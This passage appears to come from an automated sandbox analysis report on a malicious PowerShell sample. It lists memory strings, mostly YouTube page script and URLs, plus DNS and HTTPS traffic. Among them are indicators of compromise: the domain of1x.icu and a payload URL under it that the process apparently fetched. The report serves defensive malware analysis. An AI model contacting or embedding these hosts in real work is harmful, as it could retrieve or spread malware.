p$=Object.getOwnPropertyNames(window["Polymer"].Base);var i=0;var n=void 0;for(;i<p$.length&&(n=p$[i]);i++)if(!window["Polymer"].BaseDescriptors[n])try{p[n]=window["Polymer"].Base[n]}catch(e){throw new Error("Error while copying property: "+n+". Tag is "+tag);}try{Object.defineProperties(p,window["Polymer"].BaseDescriptors)}catch(e){throw new Error("Polymer define property failed for "+ Object.keys(p));}this._nativePrototypes[tag]=p}return p}function handlePolymerError(msg){window.onerror(msg,window.location.href,0,0,new Error(Array.prototype.join.call(arguments,",")))}var origPolymer=window["Polymer"];var newPolymer=function(config){if(!origPolymer._ytIntercepted&&window["Polymer"].Base){origPolymer._ytIntercepted=true;window["Polymer"].Base._getExtendedNativePrototype=_getExtendedNativePrototype;window["Polymer"].Base._error=handlePolymerError;window["Polymer"].Base._warn=handlePolymerError}return origPolymer.apply(this, arguments)};var origDescriptor=Object.getOwnPropertyDescriptor(window,"Polymer");Object.defineProperty(window,"Polymer",{set:function(p){if(origDescriptor&&origDescriptor.set&&origDescriptor.get){origDescriptor.set(p);origPolymer=origDescriptor.get()}else origPolymer=p;if(typeof origPolymer==="function")Object.defineProperty(window,"Polymer",{value:origPolymer,configurable:true,enumerable:true,writable:true})},get:function(){return typeof origPolymer==="function"?newPolymer:origPolymer},configurable:true, enumerable:true})})();}).call(this); </script><script nonce="nAc2EUZbnz1lwNgXJC1-PA">window.Polymer=window.Polymer\|\|{};window.Polymer.legacyOptimizations=true;window.Polymer.setPassiveTouchGestures=true;window.ShadyDOM={force:true,preferPerformance:true,noPatch:true}; windh( equals www.youtube.com (Youtube)
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8C6E1000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	String found in binary or memory: true;else if(stack.indexOf("trapProp")>=0&&stack.indexOf("trapChain")>=0)thirdPartyScript=true;else if(message.indexOf("redefine non-configurable")>=0)thirdPartyScript=true;var baseUrl=window["ytcfg"].get("EMERGENCY_BASE_URL","https://www.youtube.com/error_204?t=jserror&level=ERROR");var unsupported=message.indexOf("window.customElements is undefined")>=0;if(thirdPartyScript\|\|unsupported)baseUrl=baseUrl.replace("level=ERROR","level=WARNING");var parts=[baseUrl];var key;for(key in values){var value= equals www.youtube.com (Youtube)
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8C6E1000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	String found in binary or memory: var combinedLineAndColumn=err.lineNumber;if(!isNaN(err["columnNumber"]))combinedLineAndColumn=combinedLineAndColumn+(":"+err["columnNumber"]);var stack=err.stack\|\|"";var values={"msg":message,"type":err.name,"client.params":"unhandled window error","file":err.fileName,"line":combinedLineAndColumn,"stack":stack.substr(0,500)};var thirdPartyScript=!err.fileName\|\|err.fileName==="<anonymous>"\|\|stack.indexOf("extension://")>=0;var replaced=stack.replace(/https:\/\/www.youtube.com\//g,"");if(replaced.match(/https?:\/\/[^/]+\//))thirdPartyScript= equals www.youtube.com (Youtube)
Source: Unmidwifed.Sur.2.dr	String found in binary or memory: window.polymerSkipLoadingFontRoboto = true;</script><link rel="shortcut icon" href="https://www.youtube.com/s/desktop/c01ea7e3/img/logos/favicon.ico" type="image/x-icon"><link rel="icon" href="https://www.youtube.com/s/desktop/c01ea7e3/img/logos/favicon_32x32.png" sizes="32x32"><link rel="icon" href="https://www.youtube.com/s/desktop/c01ea7e3/img/logos/favicon_48x48.png" sizes="48x48"><link rel="icon" href="https://www.youtube.com/s/desktop/c01ea7e3/img/logos/favicon_96x96.png" sizes="96x96"><link rel="icon" href="https://www.youtube.com/s/desktop/c01ea7e3/img/logos/favicon_144x144.png" sizes="144x144"><script nonce="nAc2EUZbnz1lwNgXJC1-PA">if ('undefined' == typeof Symbol \|\| 'undefined' == typeof Symbol.iterator) {delete Array.prototype.entries;}</script><script nonce="nAc2EUZbnz1lwNgXJC1-PA">var ytcsi={gt:function(n){n=(n\|\|"")+"data_";return ytcsi[n]\|\|(ytcsi[n]={tick:{},info:{},gel:{preLoggedGelInfos:[]}})},now:window.performance&&window.performance.timing&&window.performance.now&&window.performance.timing.navigationStart?function(){return window.performance.timing.navigationStart+window.performance.now()}:function(){return(new Date).getTime()},tick:function(l,t,n){var ticks=ytcsi.gt(n).tick;var v=t\|\|ytcsi.now();if(ticks[l]){ticks["_"+l]=ticks["_"+l]\|\|[ticks[l]];ticks["_"+l].push(v)}ticks[l]= equals www.youtube.com (Youtube)
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8C6E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: window.polymerSkipLoadingFontRoboto = true;</script><link rel="shortcut icon" href="https://www.youtube.com/s/desktop/c01ea7e3/img/logos/favicon.ico" type="image/x-icon"><link rel="icon" href="https://www.youtube.com/s/desktop/c01ea7e3/img/logos/favicon_32x32.png" sizes="32x32"><link rel="icon" href="https://www.youtube.com/s/desktop/c01ea7e3/img/logos/favicon_48x48.png" sizes="48x48"><link rel="icon" href="https://www.youtube.com/s/desktop/c01ea7e3/img/logos/favicon_96x96.png" sizes="96x96"><link rel="icon" href="https://www.youtube.com/s/desktop/c01ea7e3/img/logos/favicon_144x144.png" sizes="144x144"><script nonce="nAc2EUZbnz1lwNgXJC1-PA">if ('undefined' == typeof Symbol \|\| 'undefined' == typeof Symbol.iterator) {delete Array.prototype.entries;}</script><script nonce="nAc2EUZbnz1lwNgXJC1-PA">var ytcsi={gt:function(n){n=(n\|\|"")+"data_";return ytcsi[n]\|\|(ytcsi[n]={tick:{},info:{},gel:{preLoggedGelInfos:[]}})},now:window.performance&&window.performance.timing&&window.performance.now&&window.performance.timing.navigationStart?function(){return window.performance.timing.navigationStart+window.performance.now()}:function(){return(new Date).getTime()},tick:function(l,t,n){var ticks=ytcsi.gt(n).tick;var v=t\|\|ytcsi.now();if(ticks[l]){ticks["_"+l]=ticks["_"+l]\|\|[ticks[l]];ticks["_"+l].push(v)}ticks[l]=@ equals www.youtube.com (Youtube)
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8DE2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube equals www.youtube.com (Youtube)
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8DE2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube. equals www.youtube.com (Youtube)
Source: powershell.exe, 00000002.00000002.1743148388.000001CB8A6A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: powershell.exe, 00000002.00000002.1777092431.000001CBA4599000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1743791119.000001CB8DE2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1743791119.000001CB8C6CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8E254000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1743791119.000001CB8DE19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com:443 equals www.youtube.com (Youtube)
Source: powershell.exe, 00000002.00000002.1778189960.000001CBA483A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.youtube.comqj-m equals www.youtube.com (Youtube)
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8DE2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.comx equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: of1x.icu
Source: global traffic	DNS traffic detected: DNS query: www.youtube.com

Source: powershell.exe, 00000002.00000002.1778189960.000001CBA47F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000002.00000002.1778189960.000001CBA47F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000002.00000002.1768862468.000001CB9C1AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8DF78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1743791119.000001CB8DDF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://of1x.icu
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8C366000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8C141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8DE2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1743791119.000001CB8C5E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1743791119.000001CB8C6E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1743791119.000001CB8E271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://support.google.com/accounts/answer/151657?hl=en
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8C366000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8DE2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.youtube.com
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8DE2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://youtube-ui.l.google.com
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8C141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000002.00000002.1768862468.000001CB9C1AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.1768862468.000001CB9C1AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.1768862468.000001CB9C1AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8DE2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1743791119.000001CB8C5E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1743791119.000001CB8C6E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1743791119.000001CB8E271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/youtube_main
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8C366000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8CADA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8C6E1000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	String found in binary or memory: https://i.ytimg.com/generate_204
Source: powershell.exe, 00000002.00000002.1768862468.000001CB9C446000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	String found in binary or memory: https://i.ytimg.com/vi/-8yWWBQJvx0/frame0.jpg
Source: powershell.exe, 00000002.00000002.1768862468.000001CB9C446000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	String found in binary or memory: https://i.ytimg.com/vi/-8yWWBQJvx0/oar2.jpg?sqp=-oaymwEkCJUDENAFSFqQAgHyq4qpAxMIARUAAAAAJQAAyEI9AICi
Source: Unmidwifed.Sur.2.dr	String found in binary or memory: https://i.ytimg.com/vi/-Rdhra2LM_k/frame0.jpg
Source: Unmidwifed.Sur.2.dr	String found in binary or memory: https://i.ytimg.com/vi/-Rdhra2LM_k/oar2.jpg?sqp=-oaymwEkCJUDENAFSFqQAgHyq4qpAxMIARUAAAAAJQAAyEI9AICi
Source: Unmidwifed.Sur.2.dr	String found in binary or memory: https://i.ytimg.com/vi/41iWg91yFv0/frame0.jpg
Source: Unmidwifed.Sur.2.dr	String found in binary or memory: https://i.ytimg.com/vi/41iWg91yFv0/oar2.jpg?sqp=-oaymwEkCJUDENAFSFqQAgHyq4qpAxMIARUAAAAAJQAAyEI9AICi
Source: powershell.exe, 00000002.00000002.1768862468.000001CB9C446000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	String found in binary or memory: https://i.ytimg.com/vi/7rUYHhQHcI4/frame0.jpg
Source: powershell.exe, 00000002.00000002.1768862468.000001CB9C446000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	String found in binary or memory: https://i.ytimg.com/vi/7rUYHhQHcI4/oardefault.jpg?sqp=-oaymwEkCJUDENAFSFqQAgHyq4qpAxMIARUAAAAAJQAAyE
Source: powershell.exe, 00000002.00000002.1768862468.000001CB9C446000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	String found in binary or memory: https://i.ytimg.com/vi/885Jhvh-Z-I/frame0.jpg
Source: powershell.exe, 00000002.00000002.1768862468.000001CB9C446000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	String found in binary or memory: https://i.ytimg.com/vi/885Jhvh-Z-I/hq720.jpg?sqp=-oaymwEkCJUDENAFSFryq4qpAxYIARUAAAAAJQAAyEI9AICiQ3g
Source: powershell.exe, 00000002.00000002.1768862468.000001CB9C446000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	String found in binary or memory: https://i.ytimg.com/vi/G3hdDOaYhrA/frame0.jpg
Source: powershell.exe, 00000002.00000002.1768862468.000001CB9C446000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	String found in binary or memory: https://i.ytimg.com/vi/G3hdDOaYhrA/oar2.jpg?sqp=-oaymwEkCJUDENAFSFqQAgHyq4qpAxMIARUAAAAAJQAAyEI9AICi
Source: powershell.exe, 00000002.00000002.1768862468.000001CB9C446000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	String found in binary or memory: https://i.ytimg.com/vi/KUM2p2Weicg/frame0.jpg
Source: powershell.exe, 00000002.00000002.1768862468.000001CB9C446000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	String found in binary or memory: https://i.ytimg.com/vi/KUM2p2Weicg/hq720.jpg?sqp=-oaymwEkCJUDENAFSFryq4qpAxYIARUAAAAAJQAAyEI9AICiQ3g
Source: powershell.exe, 00000002.00000002.1768862468.000001CB9C446000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	String found in binary or memory: https://i.ytimg.com/vi/OeqejfDmO5A/frame0.jpg
Source: powershell.exe, 00000002.00000002.1768862468.000001CB9C446000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	String found in binary or memory: https://i.ytimg.com/vi/OeqejfDmO5A/hq720.jpg?sqp=-oaymwEkCJUDENAFSFryq4qpAxYIARUAAAAAJQAAyEI9AICiQ3g
Source: powershell.exe, 00000002.00000002.1768862468.000001CB9C446000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	String found in binary or memory: https://i.ytimg.com/vi/bs4g_aWu3xk/frame0.jpg
Source: powershell.exe, 00000002.00000002.1768862468.000001CB9C446000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	String found in binary or memory: https://i.ytimg.com/vi/bs4g_aWu3xk/hq720.jpg?sqp=-oaymwEkCJUDENAFSFryq4qpAxYIARUAAAAAJQAAyEI9AICiQ3g
Source: powershell.exe, 00000002.00000002.1768862468.000001CB9C446000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	String found in binary or memory: https://i.ytimg.com/vi/n5EuaxDzzSg/frame0.jpg
Source: powershell.exe, 00000002.00000002.1768862468.000001CB9C446000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	String found in binary or memory: https://i.ytimg.com/vi/n5EuaxDzzSg/oar2.jpg?sqp=-oaymwEkCJUDENAFSFqQAgHyq4qpAxMIARUAAAAAJQAAyEI9AICi
Source: powershell.exe, 00000002.00000002.1768862468.000001CB9C1AD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1768862468.000001CB9C150000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	String found in binary or memory: https://i.ytimg.com/vi/oHg5SJYRHA0/hqdefault.jpg
Source: powershell.exe, 00000002.00000002.1768862468.000001CB9C446000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	String found in binary or memory: https://i.ytimg.com/vi/qn5lWO39CqM/frame0.jpg
Source: powershell.exe, 00000002.00000002.1768862468.000001CB9C446000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	String found in binary or memory: https://i.ytimg.com/vi/qn5lWO39CqM/hq720.jpg?sqp=-oaymwEkCJUDENAFSFryq4qpAxYIARUAAAAAJQAAyEI9AICiQ3g
Source: powershell.exe, 00000002.00000002.1768862468.000001CB9C446000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	String found in binary or memory: https://i.ytimg.com/vi/sx_48GeZxhE/frame0.jpg
Source: powershell.exe, 00000002.00000002.1768862468.000001CB9C446000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	String found in binary or memory: https://i.ytimg.com/vi/sx_48GeZxhE/oar2.jpg?sqp=-oaymwEkCJUDENAFSFqQAgHyq4qpAxMIARUAAAAAJQAAyEI9AICi
Source: Unmidwifed.Sur.2.dr	String found in binary or memory: https://i.ytimg.com/vi/tsgEulFLLks/frame0.jpg
Source: Unmidwifed.Sur.2.dr	String found in binary or memory: https://i.ytimg.com/vi/tsgEulFLLks/oar2.jpg?sqp=-oaymwEkCJUDENAFSFqQAgHyq4qpAxMIARUAAAAAJQAAyEI9AICi
Source: powershell.exe, 00000002.00000002.1768862468.000001CB9C446000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	String found in binary or memory: https://i.ytimg.com/vi/w35Ck8mcSk0/frame0.jpg
Source: powershell.exe, 00000002.00000002.1768862468.000001CB9C446000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	String found in binary or memory: https://i.ytimg.com/vi/w35Ck8mcSk0/hq720.jpg?sqp=-oaymwEkCJUDENAFSFryq4qpAxYIARUAAAAAJQAAyEI9AICiQ3g
Source: powershell.exe, 00000002.00000002.1768862468.000001CB9C446000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	String found in binary or memory: https://i.ytimg.com/vi/yhXUh4EM3uI/frame0.jpg
Source: powershell.exe, 00000002.00000002.1768862468.000001CB9C446000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	String found in binary or memory: https://i.ytimg.com/vi/yhXUh4EM3uI/oar2.jpg?sqp=-oaymwEkCJUDENAFSFqQAgHyq4qpAxMIARUAAAAAJQAAyEI9AICi
Source: powershell.exe, 00000002.00000002.1768862468.000001CB9C1AD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1768862468.000001CB9C150000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	String found in binary or memory: https://music.youtube.com
Source: powershell.exe, 00000002.00000002.1768862468.000001CB9C1AD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1768862468.000001CB9C150000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	String found in binary or memory: https://music.youtube.com/
Source: powershell.exe, 00000002.00000002.1768862468.000001CB9C1AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8D4DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://of1x.i
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8D4DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://of1x.ic
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8DF78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1743791119.000001CB8C366000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1743791119.000001CB8D4DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://of1x.icu
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8D4DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://of1x.icu/
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8D4DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://of1x.icu/Y
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8D4DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://of1x.icu/Yk
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8D4DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://of1x.icu/YkH
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8D4DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://of1x.icu/YkHf
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8D4DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://of1x.icu/YkHfh
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8D4DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://of1x.icu/YkHfhY
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8D4DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://of1x.icu/YkHfhYC
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8D4DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://of1x.icu/YkHfhYCF
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8D4DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://of1x.icu/YkHfhYCF/
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8D4DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://of1x.icu/YkHfhYCF/g
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8D4DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://of1x.icu/YkHfhYCF/gl
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8D4DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://of1x.icu/YkHfhYCF/gli
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8D4DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://of1x.icu/YkHfhYCF/glia
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8D4DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://of1x.icu/YkHfhYCF/gliad
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8D4DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://of1x.icu/YkHfhYCF/gliadi
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8D4DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://of1x.icu/YkHfhYCF/gliadin
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8D4DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://of1x.icu/YkHfhYCF/gliadine
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8D4DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://of1x.icu/YkHfhYCF/gliadines
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8D4DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://of1x.icu/YkHfhYCF/gliadines.
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8D4DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://of1x.icu/YkHfhYCF/gliadines.p
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8D4DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://of1x.icu/YkHfhYCF/gliadines.pf
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8D4DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://of1x.icu/YkHfhYCF/gliadines.pfb
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8C366000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://of1x.icu/YkHfhYCF/gliadines.pfbP
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8E254000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1743791119.000001CB8C5D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1743791119.000001CB8DE19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8C6E1000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	String found in binary or memory: https://www.youtube.com/error_204?t=jserror&level=ERROR
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8C6E1000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	String found in binary or memory: https://www.youtube.com/s/desktop/c01ea7e3/img/logos/favicon.ico
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8C6E1000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	String found in binary or memory: https://www.youtube.com/s/desktop/c01ea7e3/img/logos/favicon_144x144.png
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8C6E1000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	String found in binary or memory: https://www.youtube.com/s/desktop/c01ea7e3/img/logos/favicon_32x32.png
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8C6E1000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	String found in binary or memory: https://www.youtube.com/s/desktop/c01ea7e3/img/logos/favicon_48x48.png
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8C6E1000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	String found in binary or memory: https://www.youtube.com/s/desktop/c01ea7e3/img/logos/favicon_96x96.png
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8C6E1000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	String found in binary or memory: https://www.youtube.com/s/desktop/c01ea7e3/jsbin/fetch-polyfill.vflset/fetch-polyfill.js
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8C6E1000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	String found in binary or memory: https://www.youtube.com/s/desktop/c01ea7e3/jsbin/intersection-observer.min.vflset/intersection-obser
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8C6E1000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	String found in binary or memory: https://www.youtube.com/s/desktop/c01ea7e3/jsbin/spf.vflset/spf.js
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8C6E1000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	String found in binary or memory: https://www.youtube.com/s/desktop/c01ea7e3/jsbin/web-animations-next-lite.min.vflset/web-animations-
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8C6E1000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	String found in binary or memory: https://www.youtube.com/s/desktop/c01ea7e3/jsbin/webcomponents-all-noPatch.vflset/webcomponents-all-
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8C5CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1743791119.000001CB8DE2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1743791119.000001CB8C5CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1743791119.000001CB8C6CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1743791119.000001CB8DE15000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1743791119.000001CB8E254000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1743791119.000001CB8C5D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1743791119.000001CB8DDF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1743791119.000001CB8DE11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1743791119.000001CB8DE19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/watch?v=oHg5SJYRHA0
Source: powershell.exe, 00000002.00000002.1743791119.000001CB8C9D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yt3.ggpht.com/ytc/AIdro_lS37vyjmNzIUpFzRVh1FZm9r8PZ2YbiwbR7YGjmq4ltw=s88-c-k-c0x00ffffff-no-

Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: unknown	HTTPS traffic detected: 104.21.86.72:443 -> 192.168.2.7:49701 version: TLS 1.2
